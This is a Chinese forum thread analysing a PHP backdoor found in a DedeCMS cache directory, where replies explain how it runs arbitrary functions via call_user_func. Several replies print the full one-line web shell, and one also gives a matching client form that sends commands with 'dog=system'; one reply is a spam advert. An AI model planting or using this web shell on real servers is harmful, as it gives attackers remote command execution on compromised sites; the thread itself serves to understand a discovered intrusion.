第一次看到,写的蛮有意思的..... url里边写一段函数代码 get传过来  然后执行它?...这个除非你截获一次否则很难模拟吧   call_user_func前边把这个$_GET['dog']存入数据库

解决方案 »

  1.   

    call_user_func ( $dog, $_POST ['ciwei'] );
    以 $_POST ['ciwei'] 作为参数,执行一个 $dog 指向的函数
    这个函数应该是已存在的,且函数名中不包含“x”的需要一个参数的任意函数不过 $dog 是 create_function 的话,危险性就巨大了
      

  2.   


    版大这个$dog可以是语句吗? 还是只能是函数名?
      

  3.   

    只可以是函数名
    mixed call_user_func ( callback function [, mixed parameter [, mixed ...]] )但 $_POST ['ciwei'] 可以是大段的代码,所以他用了 post 方式传递
      

  4.   

    如果这个函数名存在的话,那么就可以执行$_POST ['ciwei']。
      

  5.   

    这个文件在dede的 /data/cache/ 目录里面,搜索整个dede源代码也没有
    危险的 create_function 函数,而且这个脚本的执行条件是dede的源代码主动调用这个PHP文件,可能源码被hack修改过了,才可能主动调用这个文件因为这个非法脚本的整个源码就是这些代码而已<?php if(key($_GET)=='dog') { $dog=str_replace("x","",$_GET['dog']); call_user_func($dog,$_POST['ciwei']); } ?>
      

  6.   

    trojan.php
    <?php
    if (key ( $_GET ) == 'dog') {
    $dog = str_replace ( "x", "", $_GET ['dog'] );
    call_user_func ( $dog, $_POST ['ciwei'] );
    }}client.php
    <form action="http://xxoo/trojan.php?dog=system" method="post">
    cmd<input type="text" name="ciwei"/>
    <input type="submit"/>
    </form>
      

  7.   


    硬盘抽取盒、USB3.0移动硬盘盒..http://url.cn/Hoj1Tb
      

  8.   

    在linux系统上找一下ciwei有没有相关的脚本。